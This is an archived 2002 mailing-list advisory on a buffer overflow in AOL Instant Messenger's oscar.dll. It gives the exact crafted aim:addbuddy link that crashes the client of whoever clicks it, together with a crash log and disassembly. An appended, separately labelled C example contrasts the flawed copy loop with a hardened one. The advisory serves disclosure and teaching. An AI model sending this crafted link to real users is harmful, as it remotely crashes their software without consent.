Vulnerability Development mailing list archives

AIM including the beta 4.8.2646 Local/Remote Buffer Overflow


From: "Adonis.No.Spam" <adonis1 () videotron ca>
Date: Thu, 7 Mar 2002 07:23:25 -0500

                           .--------.
                          /   Bugs   \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : All versions of AIM including the beta 4.8.2646      :
Type             : Local/Remote Buffer Overflow                         :
Date             : 29-02-2002                                           :
Author           : NtWaK0 & Recon @ www.SafeHack.com                    :
+-----------------------------------------------------------------------.
We think this was not reported. Nothing was found publicly about this.

+------------------.
Crash of AIM Client \
+--------------------`--------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments though it may be false. The opinions expressed in this      :
advisory and program are my own and NOT of any company.                 :
In fact I do not work for anyone at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information.                                             :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
If you are running any version of AIM (AOL Instant Messenger) you are   :
affected by this crash; the vendor has been informed.                   :
                                                                        :
AOL's Instant Messenger client (AIM) contains a buffer overflow         :
vulnerability in the file oscar.dll.                                    :
Instant Messenger allows AOL users to send short messages to each other.:
The fault occurs in oscar.dll on a byte copy through the al register.   :
                                                                        :
+---------------------------+                                           :
Test OS Applications <<<                                                :
+---------------------------+                                           :
Tested on all versions of the Microsoft Windows family of OS with the   :
latest beta version of AIM, 4.8.2646.                                   :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
Normally I do not use AIM. But a friend of mine "Recon" told me about a :
strange problem he found. Since I am curious I installed AIM and ran    :
some tests to find out what was going on. Again, thanks Recon.          :
                                                                        :
The buffer overflow will happen if you send a specially crafted message :
to an AIM user.                                                         :
                                                                        :
To see the buffer overflow, follow these steps:                         :
1- Make sure you have AIM 4.8.2646 installed                            :
2- Open a new IM window and click the link button to set up a hyperlink :
   for your buddy.                                                      :
4- Input exactly the following text into the link:                      :
   aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
   12345678,12345678,12345678,12345678,12345678,12345678&groupname=     :
   12345678,12345678,12345678,12345678,12345678,12345678,12345678       :
   ,12345678,12345678,12345678,                                         :
                                                                        :
5- The text can be anything as long as it keeps the format: 8           :
   characters for each word added as a screenname or groupname, with    :
   11 instances for the screenname and 10 for the groupname.            :
6- A memory dump will occur as soon as the hyperlink is clicked by      :
   either side (you or your buddy).                                     :
                                                                        :
Taken from the Dr. Watson log after the buffer overflow occurred:       :
                                                                        :
function: o_strncpy                                                     :
        1218b4f9 8b4508           mov     eax,[ebp+0x8]          ss:00c :
        1218b4fc 3b450c           cmp     eax,[ebp+0xc]          ss:00c :
        1218b4ff 7419             jz      LoadRendezvousString+0x39f6 ( :
        1218b501 8a06             mov     al,[esi]                      :
        1218b503 8807             mov     [edi],al                      :
        1218b505 47               inc     edi                           :
        1218b506 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b509 46               inc     esi                           :
        1218b50a 43               inc     ebx                           :
        1218b50b 8a06             mov     al,[esi]                      :
FAULT ->1218b50d 8807             mov     [edi],al                      :
        1218b50f 47               inc     edi                           :
        1218b510 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b513 46               inc     esi                           :
        1218b514 43               inc     ebx                           :
        1218b515 803e00           cmp     byte ptr [esi],0x0            :
        1218b518 75cf             jnz     LoadRendezvousString+0x3bc5 ( :
        1218b51a 8b4d0c           mov     ecx,[ebp+0xc]          ss:00c :
        1218b51d 3bf9             cmp     edi,ecx                       :
        1218b51f 7312             jnb OscoreUseCurrentAcceleratorTable+ :
        1218b521 2bcf             sub     ecx,edi                       :
        1218b523 33c0             xor     eax,eax                       :
                                                                        :
Below is a portion of the asm code for the file oscar.dll               :
===============================================                         :
.text:1218B4E9 loc_1218B4E9:           ; CODE XREF: o_strncpy+61j      :
.text:1218B4E9                 cmp     edi, [ebp+lpsz]                  :
.text:1218B4EC                 jnb     short loc_1218B533               :
.text:1218B4EE                 push    esi             ; lpsz           :
.text:1218B4EF                 call    ds:CharNextA
.text:1218B4F5                 cmp     eax, ebx
.text:1218B4F7                 jnz     short loc_1218B50B
.text:1218B4F9                 mov     eax, [ebp+arg_0]
.text:1218B4FC                 cmp     eax, [ebp+lpsz]
.text:1218B4FF                 jz      short loc_1218B51A
.text:1218B501                 mov     al, [esi]
.text:1218B503                 mov     [edi], al
.text:1218B505                 inc     edi
.text:1218B506                 inc     [ebp+arg_0]
.text:1218B509                 inc     esi
.text:1218B50A                 inc     ebx
===============================================
.text:1218B50B loc_1218B50B:           ; CODE XREF: o_strncpy+40j
.text:1218B50B                 mov     al, [esi]
.text:1218B50D                 mov     [edi], al  ; <<<---HERE IS THE P
.text:1218B50F                 inc     edi
.text:1218B510                 inc     [ebp+arg_0]
.text:1218B513                 inc     esi
.text:1218B514                 inc     ebx
.text:1218B515                 cmp     byte ptr [esi], 0
.text:1218B518                 jnz     short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A:                           ; CODE XREF: o_s
.text:1218B51A                                         ; o_strncpy+48j
.text:1218B51A                 mov     ecx, [ebp+lpsz]
.text:1218B51D                 cmp     edi, ecx
.text:1218B51F                 jnb     short loc_1218B533
.text:1218B521                 sub     ecx, edi
.text:1218B523                 xor     eax, eax
.text:1218B525                 mov     edx, ecx
.text:1218B527                 shr     ecx, 2
.text:1218B52A                 repe stosd
.text:1218B52C                 mov     ecx, edx
.text:1218B52E                 and     ecx, 3
.text:1218B531                 repe stosb
.text:1218B533
==================================================
                                                                        :
Here are the stack variables                                            :
===========================                                             :
00000000  s              db 4 dup(?)                                    :
00000004  r              db 4 dup(?)                                    :
00000008 arg_0           dd ?                                           :
0000000C lpsz            dd ?                    ; offset (FFFFFFFF)    :
00000010 arg_8           dd ?                                           :
                                                                        :
This issue has not been tested on third-party software that supports    :
the OSCAR protocol.                                                     :
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
We could not locate an AIM email address to send this issue to.         :
+-----------------------------------------------------------------------.
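Added example, not code from the advisory or from AOL: in the listing above the limit check against [ebp+lpsz] is made only at the top of the loop (1218B4E9), while the store that faults (1218B50D) is a second byte copy inside the same iteration, and the CharNextA call suggests the routine steps over multi-byte characters. The C program below models that defect class, a length-bounded copy whose per-iteration check does not cover every write, beside a hardened version that re-checks the remaining room before each character and reserves the terminator. The lead-byte rule, the 16-byte buffer, the canary region and the sample input are all constructed assumptions; this is not a reconstruction of o_strncpy.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN    16   /* logical size of the destination buffer (assumed)   */
#define CANARY_LEN 8    /* guard bytes placed directly after it (constructed) */
#define CANARY     0xAA

/* Constructed stand-in for a DBCS lead-byte test: '1' is treated as the lead
   byte of a two-byte character, so "12" is copied as one unit. */
static int is_lead_byte(unsigned char c) { return c == '1'; }

/* Vulnerable pattern: (dst < end) is checked once per iteration, but a
   two-byte character performs two writes, so the trail byte can land on 'end'.
   Returns the number of bytes written, padding included. */
static size_t copy_naive(unsigned char *dst, unsigned char *end, const char *src)
{
    unsigned char *start = dst;
    while (*src != '\0' && dst < end) {
        if (is_lead_byte((unsigned char)*src) && src[1] != '\0') {
            *dst++ = (unsigned char)*src++;   /* guarded by the loop check */
            *dst++ = (unsigned char)*src++;   /* NOT guarded: may equal end */
        } else {
            *dst++ = (unsigned char)*src++;
        }
    }
    while (dst < end) *dst++ = 0;             /* strncpy-style zero fill */
    return (size_t)(dst - start);
}

/* Hardened copy: reserve one byte for the terminator, re-check the remaining
   room before each character, and never split a two-byte character. */
static size_t copy_bounded(unsigned char *dst, unsigned char *end, const char *src)
{
    unsigned char *start = dst;
    unsigned char *limit = end - 1;           /* last byte is always the NUL */
    while (*src != '\0' && dst < limit) {
        if (is_lead_byte((unsigned char)*src) && src[1] != '\0') {
            if (limit - dst < 2) break;       /* whole character must fit */
            *dst++ = (unsigned char)*src++;
            *dst++ = (unsigned char)*src++;
        } else {
            *dst++ = (unsigned char)*src++;
        }
    }
    while (dst < end) *dst++ = 0;             /* pad and terminate */
    return (size_t)(dst - start);
}

/* One flat region: logical buffer followed by a canary, so an overrun stays
   inside the array (defined behaviour) and can be measured. */
struct fixture { unsigned char mem[BUF_LEN + CANARY_LEN]; };

static void fixture_init(struct fixture *f)
{
    memset(f->mem, 0, BUF_LEN);
    memset(f->mem + BUF_LEN, CANARY, CANARY_LEN);
}

/* Number of canary bytes that were overwritten (0 means no overrun). */
static size_t fixture_overrun(const struct fixture *f)
{
    size_t n = 0;
    for (size_t i = 0; i < CANARY_LEN; i++)
        if (f->mem[BUF_LEN + i] != CANARY) n++;
    return n;
}

/* Constructed input: one single-byte char followed by eight two-byte chars
   (17 bytes), so the naive copy reaches dst == end - 1 with a pair pending. */
static const char SAMPLE[] = "x1212121212121212";

/* Canary bytes clobbered by each routine on SAMPLE. */
size_t demo_naive_overrun(void)
{
    struct fixture f; fixture_init(&f);
    copy_naive(f.mem, f.mem + BUF_LEN, SAMPLE);
    return fixture_overrun(&f);
}

size_t demo_bounded_overrun(void)
{
    struct fixture f; fixture_init(&f);
    copy_bounded(f.mem, f.mem + BUF_LEN, SAMPLE);
    return fixture_overrun(&f);
}

/* Bytes the hardened routine keeps of SAMPLE before the terminator. */
size_t demo_bounded_kept(void)
{
    struct fixture f; fixture_init(&f);
    copy_bounded(f.mem, f.mem + BUF_LEN, SAMPLE);
    return strlen((const char *)f.mem);
}

int main(void)
{
    printf("naive overrun: %zu byte(s)\n", demo_naive_overrun());     /* 1 */
    printf("bounded overrun: %zu byte(s)\n", demo_bounded_overrun()); /* 0 */
    printf("bounded kept: %zu byte(s)\n", demo_bounded_kept());       /* 15 */
    return 0;
}
```

Compile with any C99 compiler and run; the canary count is the observable difference between the two routines. On the hardened side, dropping a character that does not fit whole rather than splitting it is what keeps a multi-byte step from turning into the one-byte write past the limit.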





________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Hughes, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
RFCs are meant to be read and followed…:)                  /`\  NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-